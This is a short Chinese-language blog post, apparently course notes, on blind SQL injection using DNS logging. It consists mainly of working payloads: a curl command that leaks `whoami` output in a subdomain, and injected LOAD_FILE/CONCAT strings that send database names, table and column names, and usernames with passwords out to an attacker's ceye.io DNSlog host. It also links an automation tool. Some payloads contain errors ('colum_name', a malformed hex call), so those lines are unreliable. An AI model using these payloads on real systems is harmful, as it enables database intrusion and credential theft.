前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >1.3.3-SQL注入-SQL盲注-Dnslog盲注

1.3.3-SQL注入-SQL盲注-Dnslog盲注

作者头像
tea9
发布2022-07-16 16:36:27
5490
发布2022-07-16 16:36:27
举报
文章被收录于专栏:tea9的博客

需要目标机器时windows系统

DnsLog盲注

DnsLog盲注原理

Dnslog平台:http://ceye.io/

代码语言:javascript
复制
http://ceye.io/profile
curl mzq83x.ceye.io
代码语言:javascript
复制
curl `whoami`.mzq83x.ceye.io

DnsLog盲注方法

代码语言:javascript
复制
核心语法: SELECT LOAD_FILE(CONCAT('\\\\',(select database()),'.mysql.r5ourp.ceye.io\\abc'));
sql语句不能含有特殊符号
代码语言:javascript
复制
查表
?id=1' and LOAD_FILE(CONCAT('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.mysql.r5oup.ceye.io\\abc'))--+
代码语言:javascript
复制
?id=1' and LOAD_FILE(CONCAT('\\\\',(select colum_name from information_schema.columns where table_name='users' limit 5,1),'.mysql.r5ourp.ceye.io\\abc'))--+
代码语言:javascript
复制
?id=1' and LOAD_FILE(CONCAT('\\\\',(select concat(username,password) from security.users limit 0,1),'.mysql.r5ourp.ceye.io\\abc'))--+
代码语言:javascript
复制
?id=1' and LOAD_FILE(CONCAT('\\\\',(select concat_ws('A',username,password) from security.users limit 0,1),'.mysql.r5ourp.ceye.io\\abc'))--+
代码语言:javascript
复制
?id=1' and LOAD_FILE(CONCAT('\\\\',(select hex('~',username,password) from security.users limit 0,1),'.mysql.r5ourp.ceye.io\\abc'))--+

https://github.com/ADOOO/DnslogSqlinj

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • DnsLog盲注
    • DnsLog盲注原理
      • DnsLog盲注方法
      领券
      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档